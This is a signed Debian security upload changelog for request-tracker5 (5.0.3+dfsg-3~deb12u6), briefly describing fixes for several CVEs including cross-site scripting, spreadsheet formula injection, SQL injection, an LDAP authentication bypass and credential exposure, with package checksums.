-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Format: 1.8 Date: Mon, 01 Jun 2026 13:10:19 +1200 Source: request-tracker5 Architecture: source Version: 5.0.3+dfsg-3~deb12u6 Distribution: bookworm-security Urgency: medium Maintainer: Andrew Ruthven Changed-By: Andrew Ruthven Changes: request-tracker5 (5.0.3+dfsg-3~deb12u6) bookworm-security; urgency=medium . * Include missing default configuration items for security vulnerability fixes included in 5.0.3+dfsg-3~deb12u3. Namely: RestrictLinkDomains and Cipher in %SMIME. * Apply upstream patch which fixes several security vulnerabilities: - [CVE-2026-6841] Reflected cross-site scripting via the search "Page" URL parameter. - [CVE-2026-41073] Spreadsheet (CSV/formula) injection via ticket values that are exported to a spreadsheet from search results. User-controlled data is not sanitized before being written to the output file, which can cause spreadsheet applications such as Microsoft Excel to interpret crafted values as formulas or macros when the file is opened. - [CVE-2026-41075] SQL injection via the entry_aggregator parameter in JSON search. An authenticated user can craft input that is incorporated into database queries without proper validation, potentially allowing them to read or modify data in the RT database. - [CVE-2026-41076] LDAP authentication bypass when RT is configured to authenticate users against an LDAP or Active Directory server. Under certain LDAP server configurations, an attacker may be able to authenticate as any LDAP-backed RT user without supplying valid credentials. - [CVE-2026-44229] Cross-site scripting via uploaded content that is served inline rather than as an attachment. - [CVE-2026-44231] Privilege escalation and information disclosure via the REST 2.0 user collection endpoint. A Privileged RT user can obtain authentication credentials belonging to other users, including administrators, and use those credentials to read data via RT's RSS and iCal feed endpoints. The same request that exposes the credentials also rotates them, which invalidates previously-distributed feed URLs across the instance. Checksums-Sha1: f03a9b9d1e5f9339755dd2196a8e208632c45016 6209 request-tracker5_5.0.3+dfsg-3~deb12u6.dsc a71d925da35e21f8e7024a6d7e5335dfa76f26cd 173804 request-tracker5_5.0.3+dfsg-3~deb12u6.debian.tar.xz f659c90f0a5b14b909cc23492b1eca13ea3cb7b1 24453 request-tracker5_5.0.3+dfsg-3~deb12u6_amd64.buildinfo Checksums-Sha256: 6a119288f5fb389e8587a1ad1a6c8b1ea2051613241d5867b77138ad08698f81 6209 request-tracker5_5.0.3+dfsg-3~deb12u6.dsc c709246e079a88b7e91e7748f96c8cee0c6dd187243032791eb86b90c15e4d7f 173804 request-tracker5_5.0.3+dfsg-3~deb12u6.debian.tar.xz 4154881a25ee51dcdeb54a29fda087d609bc97c1f0ba4ed8b649a1124bd27d51 24453 request-tracker5_5.0.3+dfsg-3~deb12u6_amd64.buildinfo Files: 450f257ab2f44ddb2250b162570fb3f4 6209 misc optional request-tracker5_5.0.3+dfsg-3~deb12u6.dsc 52476f7d9733afc3b8b440cea42ea5d0 173804 misc optional request-tracker5_5.0.3+dfsg-3~deb12u6.debian.tar.xz 1c506283f2f34a3500d05e46b29d2a4b 24453 misc optional request-tracker5_5.0.3+dfsg-3~deb12u6_amd64.buildinfo -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEExgP8TmAPHOzRyNl8S1PZMeTT6GMFAmoj9cgACgkQS1PZMeTT 6GM/xQ/+MLE+axjSNLvhHjMQLxUCJ9h+Czebm968W+ocEaH806ZFNdqThFlIa/Jn ri8Au08MZ13F1BZYiOcZCji8Y9fcJLakjHke//kfXYBxhkTqYDy0GIJqXlprQGlo cbJD+TdQLHaxSoBH5gAk6goWYKOkTqqsDvxq4nLBFLmW/C7AifB7F6py/9jQraa5 ukDWqMBCMWBNAJEeR0kMb8TwVLoWrB/eJM3BTrItWAaDmUvIJBlG5JebLez9vbv3 wGuejA+NV2qYHedkTAW3rrXSLTv3vcTFXBKxUbkd2ZxZ+XI3b5Zi5YipcVu3dCOx bxAr9F7Z0MDv44r4EdyaTTze8hv7wQQI/V2oZ8FgGiWmmw0ky+Abzf7PH7sKQZV9 WcofNrBMFX1n7+LEhMsT3tqDEUTbYclyCazoMJw/4w3qzfpAeVwgvlK+OsCFLOA/ QQd6ix1o5gQHtIcj28JA5jJKQXoIutQ8SkaoAOf9Ejtl3f1X1AoUsO+84+nXaMr5 bZz97NpUAcbagTg5qW5/4UijhnF+lwpp8eC2SKRNDYZT0mihn18XPlpOM2sLndcw fzNwZK2BxUK1w+gTBJXeXu4RZfyyU/EO3D07ZEY+SWeRpWf+tapNVVAYhEayJl6I 1mOmoUUeTpIHFWZCdDL40KAIZ0bjADTi6iIJ8tY5P3Zm9DPNzuw= =kBdw -----END PGP SIGNATURE-----